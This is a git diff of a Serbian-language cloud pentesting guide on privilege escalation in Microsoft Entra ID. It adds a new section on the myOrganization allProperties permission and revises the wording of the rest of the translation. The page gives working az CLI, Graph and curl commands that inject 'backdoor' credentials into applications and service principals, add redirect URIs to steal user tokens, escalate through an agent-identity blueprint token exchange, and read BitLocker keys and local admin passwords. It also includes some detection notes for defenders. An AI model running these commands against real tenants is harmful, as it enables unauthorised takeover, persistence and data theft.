diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md
index 89063427a..f2d0ce8a1 100644
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md
@@ -3,13 +3,13 @@
{{#include ../../../../banners/hacktricks-training.md}}
> [!NOTE]
-> Napomena da **ne mogu sve granular permissions** koje built-in roles imaju u Entra ID **da budu elegible za korišćenje u custom roles.**
+> Napomena da **nisu sve granularne permissions** koje built-in roles imaju u Entra ID **elegible za upotrebu u custom roles.**
## Roles
### Role: Privileged Role Administrator
-Ova role sadrži potrebne granular permissions da bi mogla da dodeljuje roles principals i da daje više permissions roles. Oba postupka mogu da se zloupotrebe za escalation privileges.
+Ova role sadrži potrebne granularne permissions da bi mogla da dodeljuje roles principalima i da dodeli više permissions role-ovima. Obe akcije mogu biti abused za privilege escalation.
- Assign role to a user:
```bash
@@ -48,7 +48,7 @@ az rest --method PATCH \
]
}'
```
-## Applications
+## Aplikacije
### `microsoft.directory/applications/credentials/update`
@@ -59,15 +59,46 @@ az ad app credential reset --id --append
# Generate a new certificate without overwritting old ones
az ad app credential reset --id --create-cert
```
+### `microsoft.directory/applications.myOrganization/allProperties/update`
+
+Ova permission daje update nad **svim upisivim svojstvima** bilo koje **single-tenant** application registration (`signInAudience = AzureADMyOrg`), uključujući `passwordCredentials` i `keyCredentials`. U katalogu je označena kao `IsPrivileged: true`, ali **nije** prisutna ni u jednoj built-in role — pojavljuje se gotovo isključivo u **custom roles** koje admin kreira da delegira "manage our internal apps" bez shvatanja da podtip `.myOrganization` zapravo sužava akciju tačno na skup aplikacija koje najverovatnije imaju privilegovane Microsoft Graph permissions.
+
+- Enumerate apps with privileged Microsoft Graph permissions consented:
+```bash
+# SPs with at least one Microsoft Graph app role assigned
+GRAPH_SP_ID=$(az ad sp show --id 00000003-0000-0000-c000-000000000000 --query id -o tsv)
+az rest --method GET \
+--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$GRAPH_SP_ID/appRoleAssignedTo" \
+--query "value[].{App:principalDisplayName, SP:principalId, RoleId:appRoleId}" \
+-o table
+
+# Resolve a RoleId to the human-readable permission name
+az ad sp show --id 00000003-0000-0000-c000-000000000000 \
+--query "appRoles[?id==''].value" -o tsv
+```
+- Potvrdite da je cilj single-tenant (unutar `.myOrganization` subtype scope):
+```bash
+az rest --method GET \
+--uri "https://graph.microsoft.com/v1.0/applications(appId='')" \
+--query "{audience:signInAudience, name:displayName}"
+# audience must be "AzureADMyOrg"
+```
+- Injectuj credential u target app — jedini privilegovani korak u chain-u:
+```bash
+az rest --method POST \
+--uri "https://graph.microsoft.com/v1.0/applications(appId='')/addPassword" \
+--headers "Content-Type=application/json" \
+--body '{"passwordCredential":{"displayName":"backdoor"}}'
+```
### `microsoft.directory/applications.myOrganization/credentials/update`
-Ovo omogućava iste akcije kao `applications/credentials/update`, ali je ograničeno na single-directory aplikacije.
+Ovo dozvoljava iste akcije kao `applications/credentials/update`, ali je scoped na single-directory applications.
```bash
az ad app credential reset --id --append
```
### `microsoft.directory/applications/owners/update`
-Dodavanjem sebe kao owner-a, napadač može manipulisati aplikacijom, uključujući credentials i permissions.
+Dodavanjem sebe kao owner-a, napadač može da manipuliše application, uključujući credentials i permissions.
```bash
az ad app owner add --id --owner-object-id
az ad app credential reset --id --append
@@ -77,9 +108,9 @@ az ad app owner list --id
```
### `microsoft.directory/applications/allProperties/update`
-Napadač može da doda redirect URI aplikacijama koje koriste korisnici tenant-a, a zatim da sa njima podeli login URL-ove koji koriste novi redirect URL kako bi ukrao njihove tokene. Imajte na umu da, ako je korisnik već bio prijavljen u aplikaciju, autentikacija će biti automatska, bez potrebe da korisnik bilo šta prihvati.
+Napadač može da doda redirect URI aplikacijama koje koriste korisnici tenant-a, a zatim da sa njima podeli login URL-ove koji koriste novi redirect URL kako bi ukrao njihove tokene. Imajte na umu da, ako je korisnik već bio prijavljen u application, autentikacija će biti automatska bez potrebe da korisnik išta prihvati.
-Imajte na umu da je takođe moguće promeniti permissions koje aplikacija traži kako bi dobila više permissions, ali u ovom slučaju će korisnik morati ponovo da prihvati prompt koji traži sve permissions.
+Imajte na umu da je takođe moguće promeniti permissions koje application traži kako bi se dobilo više permissions, ali će u ovom slučaju korisnik morati ponovo da prihvati prompt koji traži sve permissions.
```bash
# Get current redirect uris
az ad app show --id ea693289-78f3-40c6-b775-feabd8bef32f --query "web.redirectUris"
@@ -88,11 +119,11 @@ az ad app update --id --web-redirect-uris "https://original.com/callbac
```
### Eskalacija privilegija aplikacija
-**Kao što je objašnjeno u [ovom postu](https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/)**, bilo je vrlo uobičajeno pronaći default aplikacije koje imaju **API permissions** tipa **`Application`** dodeljene njima. API Permission (kako se naziva u Entra ID konzoli) tipa **`Application`** znači da aplikacija može da pristupi API-ju i izvršava akcije bez user context-a (bez prijave user-a u app), i bez potrebe za Entra ID roles da to dozvole. Zato je vrlo uobičajeno pronaći **visoko privilegovane aplikacije u svakom Entra ID tenant-u**.
+**Kao što je objašnjeno u [ovom postu](https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/)**, bilo je veoma uobičajeno pronaći podrazumevane aplikacije koje imaju dodeljene **API permissions** tipa **`Application`**. API Permission (kako se zove u Entra ID konzoli) tipa **`Application`** znači da aplikacija može da pristupi API-ju i izvršava akcije bez user context-a (bez user login-a u app), i bez potrebe za Entra ID roles da bi joj to bilo dozvoljeno. Zbog toga je veoma uobičajeno pronaći **high privileged aplikacije u svakom Entra ID tenant-u**.
-Zatim, ako attacker ima bilo koju permission/role koja omogućava da **ažurira credentials (secret ili certificate) aplikacije**, attacker može da generiše novi credential i zatim ga koristi da se **autentifikuje kao aplikacija**, dobijajući sve permissions koje aplikacija ima.
+Zatim, ako attacker ima bilo kakvu permission/role koja omogućava da **ažurira credentials (secret o certificate) aplikacije**, attacker može da generiše novi credential i zatim ga iskoristi da se **authenticate kao aplikacija**, čime dobija sve permissions koje aplikacija ima.
-Napomena da pomenuti blog deli neke **API permissions** uobičajenih Microsoft default aplikacija, međutim neko vreme nakon ovog report-a Microsoft je ispravio ovaj problem i sada više nije moguće prijaviti se kao Microsoft aplikacije. Ipak, i dalje je moguće pronaći **custom applications sa visokim privilegijama koje bi mogle biti abused**.
+Imajte na umu da pomenuti blog deli neke **API permissions** uobičajenih Microsoft default aplikacija, međutim, neko vreme nakon ovog izveštaja Microsoft je ispravio ovaj problem i sada više nije moguće logovati se kao Microsoft applications. Ipak, i dalje je moguće pronaći **custom applications sa high privileges koje se mogu zloupotrebiti**.
Kako enumerisati API permissions aplikacije:
```bash
@@ -125,7 +156,7 @@ az ad sp show --id --query "appRoles[?id==''].value" -o tsv
az ad sp show --id 00000003-0000-0000-c000-000000000000 --query "appRoles[?id=='d07a8cc0-3d51-4b77-b3b0-32704d1f69fa'].value" -o tsv
```
-Pronađi sve permissions API-ja aplikacija i označi Microsoft-owned API-je
+Pronađi sve API permissions aplikacija i označi Microsoft-owned API-je
```bash
#!/usr/bin/env bash
set -euo pipefail
@@ -241,34 +272,34 @@ done < <(jq -c '.[]' <<<"$apps_json")
### `microsoft.directory/servicePrincipals/credentials/update`
-Ovo omogućava napadaču da doda credentials postojećim service principals. Ako service principal ima elevated privileges, napadač može preuzeti te privileges.
+Ovo omogućava napadaču da doda credentials postojećim service principals. Ako service principal ima povišene privileges, napadač može da preuzme te privileges.
```bash
az ad sp credential reset --id --append
```
> [!CAUTION]
> Nova generisana lozinka neće se pojaviti u web konzoli, tako da ovo može biti stealth način za održavanje persistence nad service principal-om.\
-> Iz API-ja se mogu pronaći pomoću: `az ad sp list --query '[?length(keyCredentials) > 0 || length(passwordCredentials) > 0].[displayName, appId, keyCredentials, passwordCredentials]' -o json`
+> Iz API-ja mogu da se pronađu sa: `az ad sp list --query '[?length(keyCredentials) > 0 || length(passwordCredentials) > 0].[displayName, appId, keyCredentials, passwordCredentials]' -o json`
-Ako dobijete grešku `"code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid."` to je zato što **nije moguće izmeniti passwordCredentials property** od SP i prvo morate da ga unlock-ujete. Za to vam je potrebna permission (`microsoft.directory/applications/allProperties/update`) koja vam omogućava da izvršite:
+Ako dobiješ grešku `"code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid."` to je zato što **nije moguće modifikovati passwordCredentials property** SP-a i prvo moraš da ga unlock-uješ. Za to ti je potrebna permission (`microsoft.directory/applications/allProperties/update`) koja ti omogućava da izvršiš:
```bash
az rest --method PATCH --url https://graph.microsoft.com/v1.0/applications/ --body '{"servicePrincipalLockConfiguration": null}'
```
### Entra Agent ID blueprint credential abuse (`AgentIdentityBlueprint.AddRemoveCreds.All`)
-**Agent identity blueprints** su application objects i svaki blueprint takođe kreira **agent identity blueprint principal** u tenant-u. **Agent identities** su service-principal-derived deca tog blueprint path-a. Zato, ako napadač može da **doda password/certificate na blueprint** ili je već ukrao jedan od njegovih credentials, kasnije može da se autentifikuje kao **blueprint principal** i zatraži tokens za child agent identities.
+**Agent identity blueprints** su application objects i svaki blueprint takođe kreira **agent identity blueprint principal** u tenant-u. **Agent identities** su service-principal-derived deca tog blueprint path-a. Zato, ako napadač može da **doda password/certificate na blueprint** ili je već ukrao jedan od njegovih credential-a, kasnije može da se autentifikuje kao **blueprint principal** i zatraži tokens za child agent identities.
-Ovo pretvara loš Entra Agent ID role assignment u i jedno i drugo:
+Ovo pretvara lošu Entra Agent ID role assignment u oba:
- **Persistence**: novi `passwordCredential` ostaje na blueprint-u dok se ne ukloni
- **Privilege escalation**: low-trust/dev agent može da pređe u drugi high-trust blueprint i zatim deluje kao njegovi child agents
Tipični opasni path-ovi su:
-- Kompromitovan agent identity sa **`AgentIdentityBlueprint.AddRemoveCreds.All`**
-- Kompromitovan owner/sponsor/admin koji može da upravlja blueprint-om
-- Krađa postojećeg blueprint secret/certificate-a
+- Kompromitovani agent identity sa **`AgentIdentityBlueprint.AddRemoveCreds.All`**
+- Kompromitovani owner/sponsor/admin koji može da upravlja blueprint-om
+- Krađa postojećeg blueprint secret/certificate
-Dodajte novi secret na target blueprint:
+Dodaj novi secret na target blueprint:
```bash
az rest --method POST \
--url "https://graph.microsoft.com/beta/applications//addPassword" \
@@ -280,7 +311,7 @@ Ili sa Microsoft Graph PowerShell:
$params = @{ passwordCredential = @{ displayName = 'ht-backdoor' } }
Add-MgBetaApplicationPassword -ApplicationId -BodyParameter $params
```
-Ako je novi credential prihvaćen, autentifikujte se kao **blueprint principal** i abuse-ujte Agent ID token exchange. Prvi request koristi blueprint credential i postavlja **`fmi_path`** na target agent identity. Vraćeni token se zatim ponovo koristi kao **JWT bearer `client_assertion`** da bi se dobio Microsoft Graph token za taj agent identity.
+Ako se novi credential prihvati, autentifikuj se kao **blueprint principal** i zloupotrebi Agent ID token exchange. Prvi zahtev koristi blueprint credential i postavlja **`fmi_path`** na ciljanu agent identity. Vraćeni token se zatim ponovo koristi kao **JWT bearer `client_assertion`** da bi se dobio Microsoft Graph token za tu agent identity.
```bash
curl -X POST "https://login.microsoftonline.com//oauth2/v2.0/token" \
-H 'Content-Type: application/x-www-form-urlencoded' \
@@ -301,7 +332,7 @@ curl -X POST "https://login.microsoftonline.com//oauth2/v2.0/token" \
--data-urlencode 'scope=https://graph.microsoft.com/.default'
```
> [!CAUTION]
-> Ako **dev** blueprint ili njegov child agent može da doda credentials u **prod** blueprint, attacker prelazi očekivanu blueprint/agent trust boundary i dobija durable access do target agent infrastructure.
+> Ako **dev** blueprint ili njegov child agent može da doda credentials u **prod** blueprint, napadač prelazi očekivanu blueprint/agent trust boundary i stiče trajni pristup target agent infrastructure.
Quick validation / scoping:
```powershell
@@ -313,24 +344,24 @@ $app = Get-MgBetaApplication -ApplicationId
$app.AdditionalProperties['@odata.type']
$app.PasswordCredentials | ? { $_.KeyId -eq '' }
```
-Hunting notes:
+Napomene za hunting:
- Potraži **`Update application – Certificates and secrets management`** u [Az - Monitoring](../../az-services/az-monitoring.md)
-- Koreliraj **`AuditLogs`**, **`MicrosoftGraphActivityLogs`**, i **`AADServicePrincipalSignInLogs`** po vremenu, service principal ID, user-agent, IP, i `SignInActivityId` / `UniqueTokenIdentifier`
-- U `MicrosoftGraphActivityLogs`, proveri da li `RequestUri` završava sa **`/applications//microsoft.graph.addPassword`** i da li `Roles` sadrži **`AgentIdentityBlueprint.AddRemoveCreds.All`**
-- U `AADServicePrincipalSignInLogs`, pregledaj `ServicePrincipalCredentialKeyId`, `ClientCredentialType`, `Agent.agentType`, i da li je novi ključ kasnije korišćen
+- Koreliši **`AuditLogs`**, **`MicrosoftGraphActivityLogs`**, i **`AADServicePrincipalSignInLogs`** pomoću vremena, service principal ID, user-agent, IP, i `SignInActivityId` / `UniqueTokenIdentifier`
+- U `MicrosoftGraphActivityLogs`, proveri da li `RequestUri` završava na **`/applications//microsoft.graph.addPassword`** i da li `Roles` sadrži **`AgentIdentityBlueprint.AddRemoveCreds.All`**
+- U `AADServicePrincipalSignInLogs`, pregledaj `ServicePrincipalCredentialKeyId`, `ClientCredentialType`, `Agent.agentType`, i da li je novi key kasnije korišćen
-Minimalni KQL da vidiš da li se novododata secret autentifikovala:
+Minimalni KQL da vidiš da li se novododat secret autentifikovao:
```kusto
AADServicePrincipalSignInLogs
| where ServicePrincipalCredentialKeyId == ""
| project CreatedDateTime, ServicePrincipalName, ServicePrincipalId, IPAddress, UserAgent, ResourceDisplayName
```
-Ovo je povezano sa generičkim [application credential abuse](../../az-services/az-azuread.md#applications) i [service principal credential persistence](../../az-persistence/README.md#applications-and-service-principals), ali Entra Agent ID dodaje drugu fazu gde se blueprint credential može zameniti za **different agent identity token**.
+Ovo je povezano sa generic [application credential abuse](../../az-services/az-azuread.md#applications) i [service principal credential persistence](../../az-persistence/README.md#applications-and-service-principals), ali Entra Agent ID dodaje drugu fazu gde se blueprint credential može zameniti za **different agent identity token**.
### `microsoft.directory/servicePrincipals/synchronizationCredentials/manage`
-Ovo omogućava napadaču da doda credentials postojećim service principals. Ako service principal ima povišene privileges, napadač može preuzeti te privileges.
+Ovo omogućava napadaču da doda credentials postojećim service principals. Ako service principal ima povišene privilegije, napadač može preuzeti te privilegije.
```bash
az ad sp credential reset --id --append
```
@@ -354,11 +385,11 @@ az ad sp credential reset --id --append
az ad sp owner list --id
```
> [!CAUTION]
-> Nakon dodavanja novog owner-a, pokušao sam da ga uklonim, ali je API odgovorio da DELETE metoda nije podržana, iako je to metoda koju morate da koristite za brisanje owner-a. Dakle, **danas ne možete da uklonite owner-e**.
+> Nakon dodavanja novog ownera, pokušao sam da ga uklonim, ali je API odgovorio da metoda DELETE nije podržana, iako je to metoda koju treba koristiti za brisanje ownera. Dakle, **danas ne možete ukloniti ownere**.
### `microsoft.directory/servicePrincipals/disable` and `enable`
-These permissions omogućavaju da se service principals onemoguće i omoguće. Napadač bi mogao da iskoristi ovu permission da omogući service principal kom nekako može da pristupi, kako bi eskalirao privilegije.
+Ove permissions omogućavaju da se service principals onemoguće i omoguće. Napadač bi mogao da iskoristi ovu permission da omogući service principal kome nekako može da pristupi, kako bi eskalirao privilegije.
Imajte na umu da će za ovu tehniku napadaču biti potrebne dodatne permissions kako bi preuzeo enabled service principal.
```bash
@@ -370,7 +401,7 @@ az ad sp update --id --account-enabled true
```
#### `microsoft.directory/servicePrincipals/getPasswordSingleSignOnCredentials` & `microsoft.directory/servicePrincipals/managePasswordSingleSignOnCredentials`
-Ove permisije omogućavaju kreiranje i preuzimanje credentials za single sign-on, što može omogućiti pristup third-party aplikacijama.
+Ove dozvole omogućavaju kreiranje i dobijanje kredencijala za single sign-on, što bi moglo omogućiti pristup aplikacijama trećih strana.
```bash
# Generate SSO creds for a user or a group
spID=""
@@ -396,7 +427,7 @@ az rest --method POST \
### `microsoft.directory/groups/allProperties/update`
-Ova dozvola omogućava dodavanje korisnika u privilegovane grupe, što vodi do privilege escalation.
+Ova dozvola omogućava dodavanje korisnika u privilegovane grupe, što dovodi do privilege escalation.
```bash
az ad group member add --group --member-id
```
@@ -404,16 +435,16 @@ az ad group member add --group --member-id
### `microsoft.directory/groups/owners/update`
-Ova dozvola omogućava da postanete owner grupa. Owner grupe može da kontroliše članstvo u grupi i podešavanja, potencijalno eskalirajući privilegije do grupe.
+Ova dozvola omogućava da postanete owner grupa. Owner grupe može da kontroliše članstvo i podešavanja grupe, što potencijalno omogućava escalacije privilegija do grupe.
```bash
az ad group owner add --group --owner-object-id
az ad group member add --group --member-id
```
-**Napomena**: Ova dozvola isključuje Entra ID role-assignable groups.
+**Napomena**: Ovo dopuštenje isključuje Entra ID role-assignable groups.
### `microsoft.directory/groups/members/update`
-Ova dozvola omogućava dodavanje članova u grupu. Napadač bi mogao da doda sebe ili malicious naloge u privilegovane grupe, što može da omogući elevated access.
+Ovo dopuštenje omogućava dodavanje članova u group. Napadač bi mogao dodati sebe ili zlonamerne naloge u privilegovane group, što može dodeliti povišen access.
```bash
az ad group member add --group --member-id
```
@@ -430,11 +461,11 @@ az rest --method PATCH \
"membershipRuleProcessingState": "On"
}'
```
-**Napomena**: Ovo dopuštenje isključuje Entra ID role-assignable groups.
+**Napomena**: Ovo permission isključuje Entra ID role-assignable groups.
### Dynamic Groups Privesc
-Možda je moguće da korisnici eskaliraju privilegije menjajući svoje sopstvene property-je kako bi bili dodati kao članovi dynamic groups. Za više informacija proveri:
+Može biti moguće da korisnici eskaliraju privilegije modifikovanjem sopstvenih properties kako bi bili dodati kao members dynamic groups. Za više informacija pogledajte:
{{#ref}}
dynamic-groups.md
@@ -444,7 +475,7 @@ dynamic-groups.md
### `microsoft.directory/users/password/update`
-Ovo dopuštenje omogućava resetovanje lozinke za non-admin users, što potencijalnom attacker-u omogućava eskalaciju privilegija ka drugim users. Ovo dopuštenje ne može da se dodeli custom roles.
+Ovo permission omogućava reset password za non-admin users, što potencijalnom attacker-u omogućava eskalaciju privilegija ka drugim users. Ovo permission ne može biti dodeljeno custom roles.
```bash
# Update user password
userId=""
@@ -464,7 +495,7 @@ az rest --method PATCH \
```
### `microsoft.directory/users/basic/update`
-Ova privilegija omogućava modifikaciju svojstava korisnika. Uobičajeno je pronaći dinamičke grupe koje dodaju korisnike na osnovu vrednosti svojstava, stoga ova dozvola može omogućiti korisniku da postavi potrebnu vrednost svojstva kako bi postao član određene dinamičke grupe i eskalirao privilegije.
+Ova privilegija omogućava izmenu svojstava korisnika. Uobičajeno je pronaći dinamičke grupe koje dodaju korisnike na osnovu vrednosti svojstava, stoga ova dozvola može omogućiti korisniku da postavi potrebnu vrednost svojstva kako bi postao član određene dinamičke grupe i eskalirao privilegije.
```bash
#e.g. change manager of a user
victimUser=""
@@ -482,7 +513,7 @@ az rest --method PATCH \
```
## Conditional Access Policies & MFA bypass
-Loše konfigurisanih conditional access policies koje zahtevaju MFA može se zaobići, proveri:
+Pogrešno konfigurisane conditional access policies koje zahtevaju MFA mogu biti zaobiđene, proveri:
{{#ref}}
az-conditional-access-policies-mfa-bypass.md
@@ -492,7 +523,7 @@ az-conditional-access-policies-mfa-bypass.md
### `microsoft.directory/devices/registeredOwners/update`
-Ova permission omogućava attackerima da dodele sebe kao vlasnike uređaja kako bi stekli kontrolu ili pristup settings i podacima specifičnim za uređaj.
+Ova permission omogućava napadačima da sebi dodele ownership nad devices kako bi stekli control ili access do device-specific settings i data.
```bash
deviceId=""
userId=""
@@ -503,7 +534,7 @@ az rest --method POST \
```
### `microsoft.directory/devices/registeredUsers/update`
-Ova permisija omogućava napadačima da povežu svoj nalog sa uređajima kako bi stekli pristup ili zaobišli bezbednosne politike.
+Ova dozvola omogućava napadačima da povežu svoj nalog sa uređajima kako bi stekli pristup ili zaobišli bezbednosne politike.
```bash
deviceId=""
userId=""
@@ -514,7 +545,7 @@ az rest --method POST \
```
### `microsoft.directory/deviceLocalCredentials/password/read`
-Ova dozvola omogućava napadačima da pročitaju svojstva bekapovanih kredencijala lokalnog administratorskog naloga za Microsoft Entra joined uređaje, uključujući lozinku
+Ova permission omogućava napadačima da čitaju properties bekapovanih credentials lokalnog administrator accounta za Microsoft Entra joined devices, uključujući password
```bash
# List deviceLocalCredentials
az rest --method GET \
@@ -529,7 +560,7 @@ az rest --method GET \
### `microsoft.directory/bitlockerKeys/key/read`
-Ova dozvola omogućava pristup BitLocker ključevima, što bi napadaču moglo omogućiti da dešifruje diskove, kompromitujući poverljivost podataka.
+Ova dozvola omogućava pristup BitLocker ključevima, što može omogućiti napadaču da dešifruje diskove, kompromitujući poverljivost podataka.
```bash
# List recovery keys
az rest --method GET \
@@ -540,7 +571,7 @@ recoveryKeyId=""
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys/$recoveryKeyId?\$select=key"
```
-## Ostale interesting permissions (TODO)
+## Ostale interesantne permissions (TODO)
- `microsoft.directory/applications/permissions/update`
- `microsoft.directory/servicePrincipals/permissions/update`